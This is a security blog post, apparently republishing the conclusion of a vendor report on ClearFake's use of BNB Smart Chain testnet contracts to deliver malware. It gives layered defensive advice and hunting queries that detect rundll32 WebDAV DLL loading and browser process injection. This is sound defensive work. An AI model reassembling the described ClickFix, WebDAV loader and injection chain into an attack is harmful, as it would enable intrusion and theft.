Smart Contracts for C&C: How ClearFake Hid in Plain Sight on BSC Testnet

AndyC 27 May 2026

Conclusion 
This case is a concrete demonstration that blockchain-based payload delivery has graduated from a proof-of-concept curiosity to an operational threat.

Smart Contracts for C&C: How ClearFake Hid in Plain Sight on BSC Testnet

<div>Smart Contracts for C&C: How ClearFake Hid in Plain Sight on BSC Testnet</div>

Conclusion 

This case is a concrete demonstration that blockchain-based payload delivery has graduated from a proof-of-concept curiosity to an operational threat. 

The EtherHiding technique exploited in this campaign eliminates the most disruption-accessible components of traditional malware infrastructure: domains, IP addresses, and hosting providers. All four smart contracts identified in this investigation remain live on the BNB Smart Chain testnet as of writing. No action taken by any security vendor, domain registrar, or law enforcement agency can alter or remove the payloads stored within them; This is not a limitation but a fundamental property of immutable, decentralized infrastructure, and it demands that enterprise defenders rethink assumptions about what takedown-resistant C&C looks like. 

We recommend enterprises implement controls across several layers:

  • At the network layer, blocking outbound JSON-RPC traffic to known BNB Smart Chain testnet RPC endpoint starting with bsc-testnet-rpc.publicnode[.]com removes the contract query step before any payload executes. 
  • At the endpoint layer, disabling the Windows WebClient service on workstations that do not require WebDAV eliminates the delivery mechanism for the remote DLL loader entirely. Where WebClient cannot be disabled, behavioral detection rules targeting rundll32.exe with UNC path arguments are highly effective. 
  • At the browser layer, enterprise browser management policies that restrict clipboard write access can interrupt the ClickFix social engineering step before the victim executes the injected command. Organizations should also consider blocking or alerting on eth_call and JSON-RPC patterns in web proxy logs as an early-warning indicator for EtherHiding activity across their fleet. 
  • At the end-user layer, awareness training on fake CAPTCHA and ClickFix lures is the first line of defense against the social engineering component, as the entire post-infection chain in this case required a single deliberate action by the victim. 

TrendAI Vision One™ provides the cross-layer detection and investigation capability that enabled this case to be fully reconstructed. The platform’s endpoint sensor captured the complete execution chain from the initial rundll32 launch through remote thread injection, dllhost spawning, and Python RAT file drops correlating each event across process, file, and network telemetry in a single unified view. 

TrendAI™ Managed Detection and Response (MDR) provides 24/7 expert-led threat monitoring and response backed by TrendAI™ global threat intelligence. In this analysis, TrendAI™ MDR analysts pivoted from a single high-confidence endpoint alert to a full reconstruction of the blockchain delivery infrastructure to the SectopRAT payload. 

TrendAI Vision One™ Threat Intelligence Hub

TrendAI Vision One™ Threat Intelligence Hub provides the latest insights on emerging threats and threat actors, exclusive strategic reports from TrendAI™ Research, and TrendAI Vision One™ Threat Intelligence Feed in the TrendAI Vision One™ platform.

Emerging Threats: Smart Contracts for C&C: How ClearFake Hid in Plain Sight on BSC Testnet

TrendAI Vision One™ Intelligence Reports (IOC Sweeping) 

https://portal.xdr.trendmicro.com/index.html#/app/ti/intelligence?intrusionSet=Smart%20Contracts%20for%20C%26C%3A%20How%20ClearFake%20Hid%20in%20Plain%20Sight%20on%20BSC%20Testnet

Hunting Queries 

eventSubId: 301 AND hostName:bsc-testnet-rpc.publicnode.com AND processName:(chrome.exe OR msedge.exe OR microsoftedge.exe OR firefox.exe OR iexplore.exe OR opera.exe OR brave.exe OR vivaldi.exe OR waterfox.exe)

Detects DNS query from common browser processes to Binance Smart Chain testnet RPC endpoint, an indication that the user browsed a compromised website with ClearFake embedded JS. Acceptable false positives for users developing web3 apps.

eventSubId: 701 AND parentName:rundll32.exe AND parentCmd:\*** AND objectCmd:(chrome.exe OR msedge.exe OR microsoftedge.exe OR firefox.exe OR iexplore.exe OR opera.exe OR brave.exe OR vivaldi.exe OR waterfox.exe)

Detects browser process injection initiated originating from the execution of malicious DLL hosted on remote WebDAV UNC path to common browser processes.

TrendAI Vision One™ XDR Data Explorer App 

TrendAI Vision One™ customers can use the XDR Data Explorer App to match or hunt the malicious indicators mentioned in this blog post with data in their environment.    

More hunting queries are available for TrendAI Vision One™ with  Threat Intelligence Hub entitlement enabled. 

Indicators of Compromise

Indicators of compromise can be found here.

About Author

AndyC

Andy Curtis is an award-winning security consultant, researcher and public speaker. He has been working in the computer security industry since the early 1990s, having been employed by state and federal government, leading healthcare and banking providers across three continents. He has given talks about computer security for some of the world’s largest companies, worked with law enforcement agencies on investigations into hacking groups, and is a regular voice on TV and radio explaining IT security threats.

See author's posts

Tags: , , , , , , , , , , , , , ,

What do you feel about this?

More Stories

The Next AI Security Failure May Start With a Trusted Assistant

The Next AI Security Failure May Start With a Trusted Assistant

AndyC 28 May 2026
7-Eleven Breach: Hackers Claim 600,000 Records Stolen

7-Eleven Breach: Hackers Claim 600,000 Records Stolen

AndyC 28 May 2026
FBI Warns: ‘Kali365’ Phishing Service Targets Microsoft 365 Accounts

FBI Warns: ‘Kali365’ Phishing Service Targets Microsoft 365 Accounts

AndyC 28 May 2026
‘Tiny11’ Gives Windows 10 Users a Risky Upgrade Path

‘Tiny11’ Gives Windows 10 Users a Risky Upgrade Path

AndyC 28 May 2026
Proofpoint Introduces Active Exploits Protection to Help Organizations Prioritize Vulnerability Patching for Real-World Attacks in the AI Era

Proofpoint Introduces Active Exploits Protection to Help Organizations Prioritize Vulnerability Patching for Real-World Attacks in the AI Era

AndyC 27 May 2026

Sophos Firewall and Synchronized Security

AndyC 27 May 2026

You may have missed

The LA Metro Attack Wasn’t Hacktivism. It Was a State Operation With a Costume On.

The LA Metro Attack Wasn’t Hacktivism. It Was a State Operation With a Costume On.

AndyC 28 May 2026
Grandoreiro Malware and BTMOB RAT Campaigns Target Windows and Android Users

Grandoreiro Malware and BTMOB RAT Campaigns Target Windows and Android Users

AndyC 28 May 2026
Malicious npm Package Stole Files From Claude AI User Directory via GitHub

Malicious npm Package Stole Files From Claude AI User Directory via GitHub

AndyC 28 May 2026
The Next AI Security Failure May Start With a Trusted Assistant

The Next AI Security Failure May Start With a Trusted Assistant

AndyC 28 May 2026
7-Eleven Breach: Hackers Claim 600,000 Records Stolen

7-Eleven Breach: Hackers Claim 600,000 Records Stolen

AndyC 28 May 2026

Subscribe To InfoSec Today News

You have successfully subscribed to the newsletter

There was an error while trying to send your request. Please try again.

World Wide Crypto will use the information you provide on this form to be in touch with you and to provide updates and marketing.